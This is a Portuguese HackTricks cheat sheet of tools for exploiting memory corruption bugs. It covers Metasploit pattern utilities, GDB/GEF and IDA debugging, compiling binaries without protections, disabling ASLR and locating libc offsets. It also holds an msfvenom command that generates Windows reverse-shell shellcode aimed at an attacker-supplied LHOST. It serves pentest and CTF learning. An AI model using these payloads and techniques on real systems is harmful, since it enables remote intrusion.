| .. | ||
| pwntools.md | ||
| README.md | ||
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.
Metasploit
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
Códigos Shell
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
GDB
Instalação
apt-get install gdb
Parâmetros
-q --> Não exibir banner
-x <arquivo> --> Auto-executar instruções do GDB a partir daqui
-p <pid> --> Anexar ao processo
Instruções
> disassemble main --> Desmontar a função
> disassemble 0x12345678
> set disassembly-flavor intel
> set follow-fork-mode child/parent --> Seguir processo criado
> p system --> Encontrar o endereço da função system
> help
> quit
> br func --> Adicionar breakpoint à função
> br *func+23
> br *0x12345678
> del NUM --> Excluir esse número de br
> watch EXPRESSÃO --> Parar se o valor mudar
> run --> Executar
> start --> Iniciar e parar em main
> n/next --> Executar próxima instrução (não dentro)
> s/step --> Executar próxima instrução
> c/continue --> Continuar até o próximo breakpoint
> set $eip = 0x12345678 --> Alterar valor de $eip
> info functions --> Informações sobre funções
> info functions func --> Informações da função
> info registers --> Valor dos registradores
> bt --> Pilha
> bt full --> Pilha detalhada
> print variável
> print 0x87654321 - 0x12345678 --> Calcular
> examine o/x/u/t/i/s dir_mem/reg/ponteiro --> Mostra conteúdo em octal/hexadecimal/decimal/binário/instrução/ascii
- x/o 0xDir_hex
- x/2x $eip --> 2 palavras a partir de EIP
- x/2x $eip -4 --> $eip - 4
- x/8xb $eip --> 8 bytes (b-> byte, h-> 2 bytes, w-> 4 bytes, g-> 8 bytes)
- i r eip --> Valor de $eip
- x/w ponteiro --> Valor do ponteiro
- x/s ponteiro --> String apontada pelo ponteiro
- x/xw &ponteiro --> Endereço onde o ponteiro está localizado
- x/i $eip —> Instruções do EIP
GEF
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
Truques
Mesmos endereços no GDB
Durante a depuração, o GDB terá endereços ligeiramente diferentes dos usados pelo binário quando executado. Você pode fazer com que o GDB tenha os mesmos endereços fazendo o seguinte:
unset env LINESunset env COLUMNSset env _=<caminho>Coloque o caminho absoluto para o binário- Explorar o binário usando a mesma rota absoluta
PWDeOLDPWDdevem ser os mesmos ao usar o GDB e ao explorar o binário
Rastrear para encontrar funções chamadas
Quando você tem um binário vinculado estaticamente, todas as funções pertencerão ao binário (e não a bibliotecas externas). Nesse caso, será difícil identificar o fluxo que o binário segue para, por exemplo, solicitar entrada do usuário.
Você pode identificar facilmente esse fluxo executando o binário com gdb até ser solicitado a inserir dados. Em seguida, pare com CTRL+C e use o comando bt (backtrace) para ver as funções chamadas:
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
Servidor GDB
gdbserver --multi 0.0.0.0:23947 (no IDA, você precisa preencher o caminho absoluto do executável na máquina Linux e na máquina Windows)
Ghidra
Encontrar o deslocamento da pilha
Ghidra é muito útil para encontrar o deslocamento para uma sobreposição de buffer graças às informações sobre a posição das variáveis locais.
Por exemplo, no exemplo abaixo, um fluxo de buffer em local_bc indica que você precisa de um deslocamento de 0xbc. Além disso, se local_10 for um cookie canário, indica que para sobrescrevê-lo a partir de local_bc, há um deslocamento de 0xac.
Lembre-se de que os primeiros 0x08 de onde o RIP é salvo pertencem ao RBP.
GCC
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Compilar sem proteções
-o --> Saída
-g --> Salvar código (GDB poderá vê-lo)
echo 0 > /proc/sys/kernel/randomize_va_space --> Para desativar o ASLR no Linux
Para compilar um shellcode:
nasm -f elf assembly.asm --> retorna um ".o"
ld assembly.o -o shellcodeout --> Executável
Objdump
-d --> Desmontar seções executáveis (ver opcodes de um shellcode compilado, encontrar Gadgets ROP, encontrar endereço de função...)
-Mintel --> Sintaxe Intel
-t --> Tabela de símbolos
-D --> Desmontar tudo (endereço de variável estática)
-s -j .dtors --> seção dtors
-s -j .got --> seção got
-D -s -j .plt --> seção plt descompilada
-TR --> Realocações
ojdump -t --dynamic-relo ./exec | grep puts --> Endereço de "puts" para modificar no GOT
objdump -D ./exec | grep "VAR_NAME" --> Endereço de uma variável estática (essas são armazenadas na seção DATA).
Despejos de núcleo
- Execute
ulimit -c unlimitedantes de iniciar meu programa - Execute
sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t - sudo gdb --core=<path/core> --quiet
Mais
ldd executável | grep libc.so.6 --> Endereço (se ASLR, então isso muda toda vez)
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Loop para ver se o endereço muda muito
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Deslocamento de "system"
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Deslocamento de "/bin/sh"
strace executável --> Funções chamadas pelo executável
rabin2 -i ejecutable --> Endereço de todas as funções
Inmunity debugger
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
IDA
Depuração em Linux remoto
Dentro da pasta do IDA, você pode encontrar binários que podem ser usados para depurar um binário em um sistema Linux. Para fazer isso, mova o binário linux_server ou linux_server64 para o servidor Linux e execute-o dentro da pasta que contém o binário:
./linux_server64 -Ppass
Em seguida, configure o depurador: Depurador (remoto linux) --> Opções de processo...:
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.